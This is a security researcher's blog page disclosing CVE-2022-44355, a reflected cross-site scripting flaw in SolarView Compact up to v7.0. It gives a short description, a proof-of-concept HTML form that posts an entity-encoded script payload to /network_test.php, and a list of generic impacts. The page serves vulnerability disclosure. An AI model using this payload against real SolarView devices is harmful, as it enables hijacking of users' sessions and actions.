Strik3r Blog
  • $ whoami
  • Security Research
    • CVEs POCs
      • CVE-2023-37831
      • CVE-2023-37832
      • CVE-2023-37833
      • CVE-2023-37835
      • CVE-2023-39695
      • CVE-2023-36082
      • CVE-2023-36081
      • CVE-2023-34673
      • CVE-2023-34672
      • CVE-2023-34671
      • CVE-2022-44354
      • CVE-2022-44355
      • CVE-2022-44356
      • CVE-2022-48164
      • CVE-2022-48165
      • CVE-2022-48166
      • CVE-2022-44357
    • How To Pass Your eJPT Exam
    • Hacking IoT Introduction
    • Hacking wireless by monitoring
    • The Art of Camouflage: Exploring Advanced PHP Backdoor Obfuscation Techniques
    • Beyond the Desktop: Exploiting a Leaked Token for API
  • Hack The Box
    • Paper
  • CyberTalents Challenges
    • Web Chanllenges
      • Private Agent
    • Intro to Cybersecurity Bootcamp CTF Assessment
  • Bug Bounty
    • Easy LFI
    • HTTP PUT Method Exploit
Powered by GitBook
On this page
  • Description
  • POC
  • Impact

Was this helpful?

  1. Security Research
  2. CVEs POCs

CVE-2022-44355

Description

Cross-site Scripting (XSS) - Reflected in all SolarView Compact up to v7.0 via crafted POST request to /network_test.php

POC

When someone opens this html file, or we can add it into our website, XSS will execute.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://{HOST}/network_test.php" method="POST">
      <input type="hidden" name="host" value="127&#46;0&#46;0&#46;1" />
      <input type="hidden" name="command" value="test&apos;&lt;script&gt;alert&#40;'XSS_By_Strik3r'&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

The consequence of an XSS attack is the same regardless of whether it is stored or reflected (or DOM Based). The difference is in how the payload arrives at the server. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

  • Perform any action within the application that the user can perform.

  • View any information that the user is able to view.

  • Modify any information that the user is able to modify.

  • Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

PreviousCVE-2022-44354NextCVE-2022-44356

Last updated 1 year ago

Was this helpful?